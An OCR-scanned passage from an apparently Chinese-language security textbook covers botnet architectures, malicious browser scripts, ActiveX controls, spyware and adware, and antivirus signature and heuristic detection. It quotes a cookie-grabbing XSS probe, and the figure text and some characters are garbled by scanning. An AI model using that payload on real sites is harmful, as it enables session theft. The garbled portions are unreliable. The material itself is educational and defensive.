道内 所 有 的 Bot 主机 ,Bot 将 该 密码 与 硬 编码 在 文件 体内 的 密码 比较 ,相同 则 将 该 用 户 的 

Nick 名 称 记 录 下 来 ,以 后 可 以 执行 该 用 户 发 送 的 命令 。 控 制 者 具有 频道 操作 权限 ,只 有 他 
能 发 出 控制 Bot 的 命令 。 

2. 僵尸 网 络 分 类 

1) 基于 P2P 协议 的 Botnet 

为 防御 摧毁 僵尸 网 络 的 纽带 ,每 个 受 感染 主机 都 建立 了 一 个 完整 的 已 感染 节点 列表 ,并 
使 用 了 公 钥 加 密 进行 更 新 过 程 的 验证 ,使 用 随机 扫描 寻找 可 交互 的 其 他 Bot 等 。 代 表 有 
Slapper Sinit\Phatbot .SpamThru、Nugache 和 Peacomm 等 。 

Wang 框架 是 典型 的 C/S 构建 方式 。Sever Bot 拥有 互联 网 全 局 静态 IP 地 址 ,僵尸 程 
序 承担 客户 端 和 服务 器 的 双重 角色 ;其 他 具有 动态 IP、 局 域 网 私有 IP 的 僵尸 程序 称 为 
Client Bots, 每 个 节点 的 邻居 节点 列表 中 只 包含 Sever Bots。 控 制 者 通过 认证 后 ,可 从 网 络 
中 的 任意 节点 注入 其 控制 命令 ; 当 一 个 节点 获取 新 的 控制 命令 后 ,通过 向 其 邻居 节点 转发 ， 
从 而 快速 传递 到 每 个 Sever Bot, Client Bot 则 从 其 邻居 节点 列表 中 的 Sever Bot 获取 控制 
命令 。 

Vogt 框架 是 层 琶 化 的 超级 僵尸 网 络 群 构建 方式 , 即 在 僵尸 网 络 的 传播 过 程 中 不 断 分 解 
以 保证 对 僵尸 网 络 规模 的 限制 ,并 通过 小 型 僵尸 网 络 间 邻 居 节 点 关系 和 基于 公 钥 加 密 的 通 
信 机 制 构造 僵尸 网 络 群 。 

P2P 驱动 的 DDoS 攻击 有 INDEX 投 毒 .路 由 表 投 毒 . 分 隔 攻击 和 Query Flood。 

2) 基于 HTTP 协议 的 Botnet 

基于 HTTP 协议 的 Botnet, 控 制 信息 可 以 绕 过 防火 墙 ,代码 体积 小 ,容易 隐藏 ,难以 检 
测 。 例 如 Bobax、Rustock 和 Clickbot 等 。 

Bot 首先 访问 一 个 注入 URL, 向 僵尸 网 络 控制 器 发 送 注册 请 求 , 如 果 连 接 成 功 , 则 僵尸 
网 络 控制 器 将 反馈 这 一 请 求 , 并 在 返回 内 容 中 包含 当前 攻击 者 对 僵尸 网 络 发 出 的 控制 命令 ， 
僵尸 程序 则 从 返回 内 容 中 解析 出 命令 并 执行 ,包括 搜索 节点 列表 、 重 定向 到 其 他 站 点 。 

以 欺骗 点 击 为 目的 的 Botnet, 通 过 网 络 广告 与 搜索 引擎 之 间 的 商业 模型 进行 盘 利 。 

3) 基于 DNS 协议 的 Botnet 

攻击 者 首先 建立 一 个 恶意 的 DNS 服务 器 发 送 和 接收 命令 和 数据 ,然后 就 等 着 计算 机 感 
染 Bot 程序 ,感染 的 计算 机 试图 与 连接 者 建立 连接 。 感 染 计算 机 通过 向 本 地 DNS 服务 器 发 
送 DNS 查询 包 , 查 找 某 一 个 以 服务 器 名 的 形式 编码 的 地 址 ,只 有 攻击 者 拥有 的 DNS 服务 器 
才能 解释 ,其 他 服务 器 只 会 转发 查询 给 其 他 DNS 服务 器 。 恶 意 DNS 服务 器 将 响应 一 个 消 
息 ,这 个 消息 的 格式 限定 在 DNS 协议 的 范围 内 ,可 能 包含 Bot 命令 或 数据 。 

3， Botnet 的 危害 ,发展 历史 与 趋势 

Botnet 主要 用 于 分 布 式 拒绝 服务 攻击 (DDoS) 。 

递归 HTTP 洪水 就 是 僵尸 工具 从 一 个 给 定 的 HTTP 链接 开始 ,然后 以 递归 的 方式 顺 
着 指定 网 站 上 所 有 的 链接 访问 (也 叫 蜂 蛛 仆 行 ) ,这 种 攻击 可 以 通过 一 个 参数 来 简单 实现 。 
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攻击 IRC 网 络 ,控制 者 命令 每 个 僵尸 工具 连接 大 量 的 IRC 受害 终端 ,被 攻击 的 IRC 服务 器 
被 来 自 数 千 个 僵尸 工具 或 者 数 千 个 频道 的 请 求 所 淹没 。 发 送 垃圾 邮件 ,已 感染 的 主机 上 打 
开 SOCKS v4/v5 代理 ;记录 键盘 ,窃取 敏感 信息 ;取得 非法 利益 资源 ,伪造 点 击 量 , 骗 取 奖 金 
或 操控 网 上 投票 和 游戏 ;作为 DOS 攻击 跳板 ,扩散 新 的 恶意 软件 。 

Google AdSense 程序 可 以 让 网 站 发 布 相关 的 Google 广告 ,根据 网 站 流量 获得 一 定 收 
人 和。 僵尸 网 络 以 自动 化 的 方式 点 击 这 些 广告 ,滥用 AdSense 获 利 。 

从 良性 Bot 的 出 现 到 恶意 Bot 的 实现 ,从 被 动 传播 到 利用 蠕虫 技术 主动 传播 ,从 使 用 简 
单 的 IRC 协议 构成 控制 信道 到 构建 复杂 多 变 的 P2P 结构 的 控制 模式 ,再 到 基于 HTTP 及 
DNS 的 控制 模式 ,Botnet 逐渐 发 展 成 规模 庞大 ,功能 多 样 . 不 易 检测 的 恶意 网 络 ,给 当前 的 
网 络 安全 带 来 了 不 容 忽 视 的 威胁 。Bot 程序 历史 如 表 2. 6 所 示 。 


表 2.6 Bot 程序 发 展 


日 期 Bot 名 称 制作 者 (姓名 或 绰号 ) 描 述 

1993.12 | Eggdrop Robey | Jeff Fisher 第 一 个 非 恶 意 IRC 机 器 人 程序 
Pointer 

1999.6 | PrettyPark 匿名 第 一 个 恶意 使 用 IRC 作为 控制 协议 的 Bot 
2000 GT-Bot Sony, mSg 和 DeadKode mi | Et 
2002.2 | SDbot SD 第 一 个 基于 代码 的 单独 的 IRC Bot 
2002.9 | Slapper 匿名 第 一 个 使 用 P2P 协议 通信 的 Bot 
2002. 10 | Agobot Ago 不 可 思议 的 强壮 ,灵活 和 模块 化 设计 
2003.9 | Sinit 匿名 使 用 随机 扫描 发 现 对 端的 P2P Bot 
2004.3 | Phatbot 匿名 基于 WASTE 协议 的 P2P Ago 
2004 Rbot/rxbot Nils RacerX90 等 SDbot 后 代 
2004 Gaobot 匿名 第 一 类 Bot ,使 用 多 种 手段 传播 
2004.5 | Bobax 匿名 使 用 HTTP 协议 做 命令 和 控制 机 制 


Botnet 的 流行 趋势 是 : 基于 IRC 的 Botnet 逐渐 减少 ;控制 国内 Bot 的 IRC 服务 器 多 数 
在 国外 ;控制 协议 从 P2P 到 HTTP 和 DNS,Botnet 通信 机 制 更 加 隐蔽 .控制 新 颖 ,更 加 难以 
发 现 和 区 分 ;互联 网 数据 中 心 (IDC) 的 托管 服务 器 成 为 热门 感染 目标 ;由 于 自我 保护 和 新 技 
术 的 实现 ,单个 Botnet 的 规模 减 小 , 绝 大 部 分 都 是 小 于 1000 台 主 机 。 

4. 僵尸 网 络 的 检测 和 防御 

僵尸 网 络 的 检测 方法 有 行为 特征 统计 分 析 、 流 量 数据 特征 匹配 、Bot 行为 仿真 监控 等 。 
可 采用 蜜 铅 (Honeypot) ,网 络 流量 限制 和 IRC Server 识别 等 技术 防御 。 


2.7 恶意 移动 代码 


移动 代码 是 一 种 小 型 程序 ,大 多 嵌入 在 Web 网 页 , 它 可 从 远程 系统 下 载 并 以 最 小 限度 
调用 或 以 不 许 用 户 介入 的 形式 在 本 地 执行 。 
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2.7.1 恶意 浏览 器 脚本 


浏览 器 脚本 支持 与 网 页 的 其 他 成 分 交互 .访问 URL 信息 、 打 开 新 的 窗口 、 四 处 拖 动 窗 
口 等 功能 。 恶 意 脚本 会 滥用 这 些 特权 ,利用 浏览 器 漏洞 窃取 Cookie 值 ,打开 过 多 的 窗口 .使 
用 户 访问 有 害 的 站 点 ,非法 增加 书签 ,甚至 监控 受害 者 的 浏览 活动 ,进行 跨 站 脚本 攻击 如 
过 script 之 alert(document. cookie) 达 /script 之 ,导致 浏览 器 被 动 持 ,系统 资源 枯竭。 

劫持 软件 (Hijackers) 可 以 改变 浏览 器 主页 .默认 搜索 引擎 ,甚至 重 定向 浏览 网 址 ,使 用 
户 无 法 到 达 目 标 网 站 ;或 者 收集 和 扩散 Cookies 信息 。Cookies 是 可 以 跟踪 Web 网 站 参数 
选择 和 口令 的 小 型 文件 。 

Java applet 是 一 段 用 Java 编写 的 可 以 嵌入 网 页 中 的 程序 ,但 需 下 载 到 客户 端 运行 。 恶 
意 Java applets 可 以 实现 恶意 脚本 的 一 些 功能 ,甚至 还 不 止 。 


2.7.2 恶意 插件 


插件 是 遵循 一 定 规范 的 应 用 程序 接口 的 扩展 程序 ,而 组 件 可 独立 提供 较 完 整 的 应 用 功 
能 。 浏 览 器 插件 是 实现 浏览 器 扩展 功能 的 有 效 工具 , 随 着 I 浏览 器 的 启动 自动 执行 ,能 够 
帮助 用 户 更 方便 地 浏览 因特网 或 调用 上 网 辅助 功能 ,如 Flash 插件 ,RealPlayer 插件 .MMS 
插件 和 MIDI 五 线 谱 插件 等 。 

插件 程序 很 可 能 与 其 他 运行 中 的 程序 发 生 冲突 ,从 而 导致 诸如 各 种 运行 时 错误 , 阻塞 
正常 程序 功能 。 浏 览 器 中 的 插件 加 载 位 置 : 工具 条 (Toolbar) ,浏览 器 辅助 (BHO) ,搜索 挂 
接 (URL Search Hook)、 下 载 ActiveX。 很 多 灰色 软件 .变脸 软件 都 以 插件 的 形式 诱骗 用 户 
安装 使 用 。 

恶意 浏览 器 插件 实现 恶意 功能 ,如 浏览 器 助手 对 象 (Browser Helper Objects, BHO) 是 
一 种 在 启动 浏览 器 时 自动 运行 的 小 程序 ,实际 上 可 归 类 为 间谍 软件 。IE 是 常用 软件 ,伴随 
着 很 多 插件 ,成 为 恶意 插件 (包括 间谍 软件 和 广告 软件 ) 首 选 。 


2.7.3 恶意 ActiveX 控件 


控件 是 一 种 基本 的 可 视 构 件 块 ,是 对 数据 和 方法 的 封装 ,包含 在 应 用 程序 中 ,控制 着 该 
程序 处 理 的 所 有 数据 以 及 关于 这 些 数据 的 交互 操作 ,为 给 定数 据 的 直接 操作 提供 单独 的 互 

ActiveX 是 以 微软 COM 模型 (Component Object Model) 为 理论 基础 建立 起 来 的 技术 ， 
通过 建立 带 有 接口 的 对 象 ,ActiveX 控件 能 被 其 他 COM 组 件 或 者 程序 调用 。 

ActiveX 控件 由 属性 方法 .事件 三 大 要 素 组 成 ,工作 在 一 个 名 为 Container( 容 器 ) 的 独 
立 软件 中 。ActiveX 控件 通过 组 件 的 方式 进行 工作 ,要 调用 ActiveX 控件 ,首先 要 创建 控件 
实例 对 象 , 对 控件 进行 实例 化 后 才 可 以 设置 和 操作 ActiveX 控件 的 属性 和 方法 。ActiveX 
控件 能 在 ASP、JSP 等 页 面 中 通过 过 object 标 签 创建 ,过 object 志 标签 包含 类 id(clsid) 或 名 
称 id(progid) ,识别 需要 实例 化 的 ActiveX 控件 。 

恶意 ActiveX 控件 是 攻击 者 创建 的 一 个 ActiveX 控件 ,其 中 可 以 有 病毒 .蠕虫 .特洛伊 
木马 和 Rootkit 等 。 
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下 浏览 器 发 出 请 求 时 , Web 服务 器 向 浏览 器 回 传 内 骨 ActiveX 控件 的 页 面 ,由 浏览 器 
负责 解释 。 在 解释 过 程 中 浏览 器 首先 用 该 控件 在 页 面 中 注 明 的 id 值 或 名 称 在 本 地 注册 表 
内 进行 查询 , 若 已 经 存在 , 则 说 明 该 控件 已 经 在 安装 ,然后 通过 注册 表 中 的 相关 信息 使 用 该 
控件 ;否则 就 要 根据 页 面 中 提示 的 该 控件 所 在 服务 器 的 地 址 ,下 载 并 完成 在 本 地 的 安装 注 
册 , 使 该 控件 成 为 本 地 资源 , 供 以 后 使 用 。 

使 用 ActiveX 控件 需要 下 载 到 本 地 进行 安装 并 且 提 供 对 外 调用 的 方法 。 所 以 对 于 每 一 
个 ActiveX 控件 ,可 能 有 如 下 几 个 方面 的 安全 漏洞 : 

(1) 调用 的 控件 可 以 创建 ,修改 或 者 删除 本 地 文件 ,修改 注册 表 等 信息 。 

(2) 调用 的 控件 可 以 获取 本 地 信息 ,如 某 文件 信息 .用户 名 、 密 码 和 IP 地 址 等 。 

(3) 调用 的 控件 可 以 通过 欺骗 行为 使 用 户 访问 恶意 网 页 .下 载 恶意 程序 等 。 

(4) 调用 的 控件 存在 缓冲 区 或 者 格式 化 字符 串 漏 洞 导致 浏览 器 或 者 系统 异常 。 

防御 浏览 器 ActiveX 的 威胁 可 在 其 安全 选项 里 设置 安全 级 别 为 中 高 级 ,禁止 某 些 危险 
ActiveX 空间 的 启用 。 


2.7.4 间谍 软件 与 恶意 广告 软件 


1. 间谍 软件 

间谍 软件 (Spyware) 是 一 种 在 用 户 不 知情 的 情况 下 ,强迫 安装 运行 在 计算 机 上 专门 秘 
密 收 集 用 户 私 密 信息 并 主动 传送 到 指定 服务 器 的 后 门 软件 。 它 能 够 削弱 用 户 对 其 使 用 经 
验 、 隐 私 和 系统 安全 的 物理 控制 能 力 ;使 用 用 户 的 系统 资源 ,包括 用 户 应 用 程序 ;或 者 搜集 、 
使 用 并 散播 用 户 的 个 人 信息 或 敏感 信息 。 

间谍 软件 发 展 之 初 , 多 被 一 些 在 线 广告 商 以 及 Kazaa 等 音乐 交换 网 站 使 用 ,将 一 些 监控 
程序 放 在 用 户 计 算 机 内 监视 其 网 上 行为 ,收集 其 兴趣 爱好 ,或 者 在 空闲 时 间 进 行 其 他 操作 。 
这 些 公司 以 让 用 户 上 网 免费 赚钱 或 免费 获得 音乐 为 岂 子 ,吸引 众多 用 户 点 击 或 下 载 软 件 ,其 
中 所 带 的 间谍 程序 便 悄 悄 地 收集 用 户 信息 ,或 发 送 广 告 ,或 者 把 用 户 信息 转卖 给 其 他 广告 公 
司 获取 利益 。 

间谍 软件 的 传播 方式 主要 有 软件 捆绑 和 岩 套 浏览 网 站 (恶意 网 页 或 网 页 木马 ) .邮件 发 
送 ,利用 漏洞 进行 主动 传播 和 植 人 (多 隐身 于 蠕虫 之 中 )。 

间谍 软件 在 通过 各 种 途径 感染 用 户 计算 机 后 ,主动 记录 键盘 击 键 ,屏幕 截图 、 追 踪 
Cookie 截获 用 户 数 据 收发 等 ,并 把 获得 的 数据 发 给 间谍 软件 数据 代理 (服务 端 ) ,黑客 也 许 
可 能 通过 代理 发 送 数 据 收集 命令 给 感染 间谍 软件 的 计算 机 。 

2. 恶意 广告 软件 

告 典 入 网 页 或 捆绑 程序 软件 销售 是 一 种 软件 至 利 模 式 , 以 降低 软件 开发 与 经 营 成 本 。 

广告 软件 (Adware) 是 指 一 个 附 在 主 软件 程序 或 网 站 中 以 广告 作为 一 利 目标 的 软件 ,往往 作 
为 浏览 器 插件 。 

恶意 广告 软件 是 指示 经 用 户 允 许 , 下 载 并 安装 或 与 其 他 软件 捆绑 通过 弹出 式 广 告 或 以 
其 他 形式 进行 商业 广告 宣传 的 程序 。 恶 意 广告 软件 具有 感染 计算 机 和 自动 连接 广告 服务 代 
理 的 功能 ,可 以 随机 或 者 根据 当前 浏览 器 内 容 弹 出 广告 和 条 幅 。 

当 用 户 打开 含 弹出 广告 的 网 页 ,使 用 户 误 认 为 广告 是 网 页 的 一 部 分 (有 时 也 确实 是 的 )， 
关闭 广告 图 片 或 视频 可 能 引起 网 页 重 定向 。 用 户 浏 览 或 打开 相关 连接 后 ,广告 软件 悄悄 下 
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载 安装 并 感染 用 户 计算 机 。 广 告 软件 感染 用 户 计算 机 后 ,向 广告 代理 请 求 广告 内 容 , 广 告 商 
随时 更 新 广告 代理 的 内 容 , 并 把 诱 使 用 户 “ 立 刻 买 (Buy Now1!) ?的 广告 发 送 给 感染 计算 机 显 
示 给 用 户 。 

3. 广告 软件 和 间谍 软件 的 危害 

此 类 软件 往往 会 强制 安装 并 无 法 印 载 ; 在 后 台 收 集 用 户 信息 牟 利 , 危 及 用 户 隐 私 ; 频 繁 
弹出 广告 ,消耗 系统 资源 ,使 其 运行 变 慢 或 系统 异常 等 。 和 浏览 器 支持 软件 一 起 归 类 为 流 谍 
软件 。 

例如 ,PurityScan 是 一 个 显示 弹出 广告 ,声称 可 以 发 现 并 删除 个 人 计算 机 上 的 色情 内 容 
的 程序 。Transponder (vx2) 是 一 个 IE* 浏 览 器 助手 ”, 它 能 够 监控 网 络 浏览 并 发 送 相关 广 
告 。KeenValue 广告 程序 收集 个 人 信息 并 向 计算 机 用 户 发 送 广告 。 

Perfect Keylogger 工具 记录 用 户 所 访问 过 的 站 点 、. 击 键 和 鼠标 的 移动 ,记录 用 户 的 口令 
和 账户 等 信息 。 包 括 “ 键 盘 记录 软件 ”或 “按键 捕获 寄生 虫 ”。 

CoolWebSearch 完全 支持 I 浏览 器 ,可 能 是 最 下 流 也 是 最 恶毒 的 程序 。 

4. 间谍 软件 和 广告 软件 检测 工具 

常用 的 反 间 谍 软 件 有 Sunbelt Software 的 CounterSpy 1. 5B 版 (尚未 正式 发 布 )、 
Webroot 的 Spy Sweeper 4、FBM Software 的 ZeroSpyware 2005。 

其 他 反 间 谍 软 件 : Spybot Search and Destroy(SpyBot S&.D) 能 扫描 用 户 硬 盘 , 找 出 并 
清除 硬盘 里 面 的 广告 和 间谍 程序 ,支持 常用 的 所 有 浏览 器 。Spy Sweeper 实时 保护 网 页 浏 
览 , 免 受 间谍 ,广告 软件 的 入侵 ,保护 个 人 的 信息 。Spyware Doctor 是 一 个 先进 的 反 间谍 广 
告 软件 , 它 可 以 检查 并 移 走 间谍 软件 .广告 软件 .木马 程序 .键盘 记录 器 和 追踪 威胁 。 
SpyRemover 一 个 是 专门 清除 间谍 程序 的 网 络 安全 工具 ,支持 多 国语 言 。 还 有 微软 的 
AntiSpyware 和 McAfee 的 反 间谍 软件 。 


2.7.5 恶意 移动 代码 的 特点 比较 


恶意 代码 的 地 下 经 济 体系 产业 链 将 更 加 隐蔽 ,各 自分 工 与 协作 将 更 加 团队 化 ,企业 化 。 
网 站 挂 马 事件 将 会 不 断 增加 ,DDOS 攻击 将 会 持续 增长 ,智能 手机 病毒 疫情 未 来 可 能 会 较为 
严重 ,网 络 钓鱼 已 不 是 单纯 骗取 网 银 账号 ,扩张 到 其 他 行业 谋取 间接 的 利益 。 恶 意 代 码 的 特 
点 对 比如 表 2.7 所 示 。 


表 2.7 恶意 代码 特点 对 比 


类 型 \ 特 点 传 播 性 可 控 性 窃 密 人 性 危害 性 
僵尸 程序 可 控 传 播 高 度 可 控 有 完全 控制 远程 计算 机 
蠕虫 主动 非 受 控 传播 | 不 可 控 无 占用 主机 和 网 络 资源 
木马 干预 传播 可 控 有 完全 控制 远程 计算 机 
病毒 干预 传播 不 可 控 无 破坏 文件 
间谍 软件 负载 传播 不 可 控 严重 窃 密 窃取 信息 


2.8 反 病 毒 原理 与 技术 


病毒 的 自 保护 技术 主要 有 加 密 加 壳 、 免 杀 技 术 、 反 反 汇编 (Antidisassembly) 、 择 入 花 指 
令 , 多 态 病 毒 (Polymorphic Viruses)、 变形 病毒 (Metamorphic Viruses)、 反 跟踪 
(Antidebugging)、 抗 启发 式 检测 (Antiheuristics)、 抗 仿真 (Antiemulation) 和 抗 替 罪 羊 
(Antigoat) 等 。 

反 病 毒 技术 主要 有 特征 值 匹配 、 校 验 和 验证 、 虚 拟 机 仿真 、 启 发 式 扫描 ,行为 检测 、 实 时 
监控 和 免疫 等 。 反 蠕虫 需 对 蠕虫 共性 进行 研究 和 预防 ;对 具体 漏洞 进行 特征 研究 ,针对 性 预 
防 ;通过 异常 流量 检测 蠕虫 ,在 关键 网 络 节点 过 滤 攻 击 包 ;通过 特征 值 查 杀 蠕 虫 ; 利 用 蠕虫 对 
抗 蠕虫 ,或 给 计算 机 打 补 丁 。 


2.8.1 病毒 检测 原理 


反 病 毒 技术 可 概括 为 实时 监控 进程 行为 .注册 表 和 文件 读 写 与 安装 。 反 病毒 技术 的 杀 
毒 原理 包括 检查 进程 .比较 特征 码 ,是 病毒 则 关闭 其 进程 。 检 查 注册 表 , 有 已 知 病毒 注册 值 
则 删除 或 更 改 。 检 查 文件 .比较 特征 码 , 是 病毒 则 删除 或 隔离 病毒 文件 集 ; 或 者 用 原始 文件 
替换 毒 文件 ;或 者 解码 文件 ,剔除 病毒 代码 。 
病毒 免疫 原理 就 是 给 已 知 病毒 的 常 感染 文件 添加 “已 感染 特征 码 ”, 防 止 被 感染 。 
1. 特征 匹配 
特征 码 匹配 技术 速度 快 、 准 确 率 高 ,但 不 能 对 付 变形 病毒 或 加 密 病毒 。 
1) 特征 码 的 选取 
(1) 获取 一 个 病毒 程序 的 长 度 , 根 据 长 度 可 以 将 文件 分 为 几 份 , 份 数 根据 样本 长 度 而 
定 ,可 以 是 3~5 份 , 也 可 以 更 多 。 分 成 几 段 获取 特征 码 的 方法 可 以 很 大 程度 上 避免 采用 单 
一 特征 码 误 报 病毒 现象 的 发 生 ,也 可 以 避免 特征 码 过 于 集中 造成 的 误 报 。 
(2) 每 份 中 选取 通常 为 16 或 32 个 字 节 长 的 特征 串 。 
(3) 选取 的 原则 尽量 是 该 病毒 独一无二 的 特征 。 如 果 选 出 来 的 信息 是 很 多 文件 都 具有 
的 通用 信息 (静态 广 谱 特 征 ) 或 全 零 字 节 , 则 舍弃 ,调整 偏 移 量 后 重新 选取 。 
例如 ,香港 病毒 特征 为 1F 58 EA 1A AF 00 F0 9C。 
2) 病毒 特征 记录 库 
一 个 病毒 记录 由 多 个 特征 组 成 ,多 个 病毒 记录 构成 病毒 库 , 结 构 描 述 如 下 : 
typedef struct tagVSIGNATURE // 病 毒 特 征 描述 
| BAV_SIGN TYPE eType; 
DWORD dwOffset; 
DWORD dwSize; 
BYTE Signature[ MAX SIGNATURE, IEN] 
}VSIGNATURE, * PVSIGNATURE; 
typedef struct tagVRECORD // 病 毒 记录 描述 
: int nsize; 
DWORD dwVirusID; 
DWORD dwSignCount; 


PVSIGNATURE pVSinq[ 8]; 
DWORD dwTreatCount; 
PVTREATMENT pvTreat[ 8]; 
} VRECORD, * PVRECORD; 
3) 传统 特征 码 扫描 技术 
(1) 由 反 病毒 样本 分 析 专 家 通过 逆向 反 编译 技术 ,使 用 反 编译 器 (ollydbg、ida 和 trw 
等 ) 来 检查 可 疑 样本 文件 是 否 存 在 恶意 代码 ,从 而 判定 程序 文件 是 否 属于 正常 程序 或 病毒 、 
恶意 软件 。 
(2) 根据 标准 对 确 属 可 疑 程序 样本 进行 特征 提取 和 样本 命名 (不 同安 全 厂商 有 自己 规 
定 的 特征 提取 点 和 样本 命名 规则 ) ,经 过 测试 后 加 入 病毒 库 发 布 。 
(3) 利用 杀毒 引擎 对 系统 上 的 文件 自动 进行 特征 值 提取 并 与 病毒 库 中 已 存 特征 值 比 
对 ,条 件 符合 即 比 对 结果 为 真 时 , 即 判断 此 文件 为 病毒 库 中 记录 的 特征 值 对 应 的 病毒 名 称 的 
病毒 (恶意 软件 ) 。 
静态 特征 匹配 的 搜索 函数 Search 是 用 于 在 病毒 库 中 匹配 特征 的 成 员 函 数 。 
2. 行为 监控 
监控 进程 对 中 断 向 量 表 的 修改 ,对 引导 记录 的 修改 ,对 . exe、 com 等 可 执行 文件 的 写 操 
作 , 对 *.ini 等 启动 配置 文件 的 修改 ,监控 内 存 驻 留 。 
3. 软件 模拟 
在 虚拟 机 中 模拟 病毒 软件 执行 ,分 析 结 果 是 否 恶 意 。 
4. 反 病 毒 检测 引擎 
引擎 (CEngine) 负 责 被 扫描 对 象 的 遍历 ,引擎 遍历 目录 ,将 找到 的 文件 生成 被 扫描 对 象 
(CScanObj) 交 给 当前 病毒 库 对 象 的 Search() 方 法 。 而 病毒 数据 库 对 象 (CVirusDB) 则 负责 
在 自己 管理 的 库 中 搜索 。 反 病毒 检测 引擎 结构 如 图 2. 16 所 示 。 


二 进 制 执行 文件 cul (m7) 
脱 这 
基于 二 进 制 文件 
| 
文本 文件 语法 分 析 压 缩 器 ~| 脚本 检测 引擎 
Office 文 件 虚拟 机 脚本 调试 
ice 虚 
杀毒 库 病毒 检测 结果 分 析 
预 处 理 执行 “上 生成 杀毒 脚本 | 


图 2.16 反 病 毒 检测 引擎 结构 图 
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2.8.2 启发 式 扫描 技术 


启发 式 是 指 运 用 某 种 经 验 或 知识 去 判定 未 知事 物 的 方法 。 在 没有 符合 特征 值 比 对 时 ， 
根据 反 编 译 后 程序 代码 所 调用 的 win32 API 函数 情况 (特征 组 合 、 出 现 频率 等 ) 判 断 程序 的 
具体 目的 是 否 为 病毒 .恶意 软件 ,符合 判断 条 件 即 报警 提示 用 户 发 现 可 疑 程序 ,达到 防御 未 
知 病毒 .恶意 软件 的 目的 。 

例如 ,一 个 可 疑 程序 通过 反 病 毒 杀毒 引擎 反 编译 后 ,发 现代 码 中 自动 释放 可 执行 文件 驻 
留 系统 目录 伪装 系 统 文件 .注册 win32 服务 获取 系统 管理 权限 、 通 过 命令 行 删除 自身 文件 ， 
调用 系统 组 件 svchost. exe 来 开启 后 门 服务 ,隐藏 自身 进程 并 尝试 通过 OpenSCManagerA、 
OpenServiceA 和 ControlService 等 函数 来 开启 系统 自身 的 终端 服务 ,以 便 进一步 控制 计算 
机 。 通 过 这 些 条 件 即 可 判断 为 恶意 软件 (后 门 程序 ) 。 

1. 静态 启发 式 检测 

静态 启发 技术 指 的 是 在 静止 状态 下 通过 病毒 的 典型 指令 特征 识别 病毒 的 方法 ,是 对 传 
统 特征 码 扫 描 的 一 种 补充 。 扫 描 代 码 全 文 , 对 恶意 程序 进行 代码 级 的 分 析 , 识 别 程序 执行 逻 
辑 , 判 断 程序 行为 相关 性 ;检查 文件 结构 的 异常 变化 ;DOS 文件 长 度 、 创 建 时 间 ; Windows 
PE 文件 结构 分 析 。 

2. 动态 启发 式 (Heuristic) 检 测 

为 程序 提供 虚拟 运行 环境 ,对 加 密 及 变形 后 的 恶意 代码 进行 动态 分 析 , 跟 踪 程 序 流程 ， 
定位 恶意 代码 片段 ,动态 识别 病毒 木马 。 动 态 启 发 式 技 术 还 包括 行为 监测 .虚拟 机 和 特 
征 值 。 

3. 启发 式 病 毒 检 测 引擎 

启发 式 病毒 检测 引擎 局 部 结构 如 图 2. 17 所 示 。 


| 


二 进 制 否 | 行为 启发 和、 否 | 普通 二 
所 <> | 党 柜 多 在 | 进 制 机 | 一 


虚拟 机 
去 抽 
让 i 


图 2.17 启发 式 病毒 检测 引擎 


2.8.3 专业 杀毒 软件 


杀毒 软件 ,也 称 为 反 病 毒 软件 或 防毒 软件 ,是 用 于 清除 计算 机 病毒 .特洛伊 森马 和 恶意 
软件 的 一 类 软件 。 

杀毒 软件 通常 集成 监控 识别 ,病毒 扫描 和 清除 及 自动 升级 等 功能 ,有 的 杀毒 软件 还 带 有 
数据 恢复 .防火墙 和 入 侵 预 防 等 功能 ,是 计算 机 防御 系统 的 重要 组 成 部 分 。 

国外 著名 的 杀毒 软件 有 卡巴 斯 基 、 DrWeb、 McAfee、 ewido、 BitDefender、 ESET 


NOD32 ,趋势 科技 .诺顿 ,熊猫 和 Avira 小 红 爹 等 ,国内 著名 的 有 金山 毒霸 、360 杀毒 、 江 民 和 
瑞星 等 。 
专 杀 工 具 是 针对 特定 病毒 采用 特定 算法 的 杀毒 程序 。 


2.8.4 病毒 防范 措施 


预防 病毒 感染 的 措施 有 很 多 ,如 数据 备份 ,除非 必要 不 用 移动 介质 启动 ,设置 CMOS 的 
引导 记录 保护 选项 ,安装 补丁 并 及 时 更 新 ,安装 防 病毒 软件 并 及 时 更 新 病毒 库 , 限 制 文件 共 
享 , 不 轻易 打开 电子 邮件 的 附件 ,病毒 没有 处 理 前 不 要 使 用 其 他 移动 介质 ,不 运行 可 疑 程序 ， 
对 移动 介质 写 保护 等 。 
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恶意 代码 是 一 种 程序 代码 , 它 通 过 把 代码 在 不 被 察觉 的 情况 下 镶嵌 到 另 一 个 正常 程序 
或 系统 中 隐蔽 执行 ,从 而 达到 破坏 计算 机 系统 数据 的 安全 性 和 完整 性 .安装 或 运行 具有 人 侵 
性 或 破坏 性 的 程序 .恶意 占用 和 消耗 计算 机 系统 资源 的 目的 。 

按 传播 方式 ,恶意 代码 大 致 可 以 分 成 病毒 .木马 、 蜂 虫 和 恶意 移动 代码 4 类 。 

计算 机 病毒 按照 传播 方式 可 分 为 引导 型 病毒 .文件 型 病毒 (. com,. exe) 和 混合 型 病毒 ， 
一 般 由 引导 模块 感染 模块 和 表现 模块 三 个 部 分 组 成 ,经 过 潜伏 ,传染 、 触 发 和 发 作 4 个 阶 
段 。DLL 注入 和 三 线程 是 Win32PE 病毒 的 重要 技术 。 宏 病毒 是 使 用 宏 语 言 编写 的 一 种 脚 
本 病毒 程序 。 脚 本 病毒 使 用 脚本 语言 编写 ,文件 后 级 名 可 能 为 VBS、VBE、JS、JSE、WSH 和 
WSF, 通 过 电子 邮件 ,局域网 共享 ,浏览 器 和 U 盘 自 动 运行 传播 。 

网 络 蠕虫 是 一 种 利用 漏洞 通过 网 络 传播 的 恶意 病毒 。 一 个 蠕虫 程序 的 基本 功能 包括 传 
播 模块 .隐藏 模块 和 目的 模块 三 部 分 。 

后 门 病毒 是 一 个 允许 攻击 者 绕 过 系统 中 常规 安全 控制 机 制 ,为 攻击 者 提供 进入 目标 计 
算 机 的 访问 通道 的 一 种 计算 机 病毒 程序 。 有 网 页 后 门 、 线 程 插入 后 门 、 扩 展 后 门 .C/S 后 门 
和 Rootkit 后 门 等 类 型 。 

木马 程序 指 隐 藏 在 正常 程序 中 的 一 段 具 有 特殊 功能 的 恶意 代码 ,是 具备 破坏 和 删除 文 
件 .发送 密码 .记录 键盘 和 DoS 攻击 等 特殊 功能 的 后 门 程序 。 按 照 连 接 方式 分 为 主动 连接 
型 ( 正 向 连接 型 )、 反 弹 端 口 型 ,HTTP 隧道 型 和 跟随 连接 型 等 ,具有 隐蔽 .欺骗 .自动 运行 、 
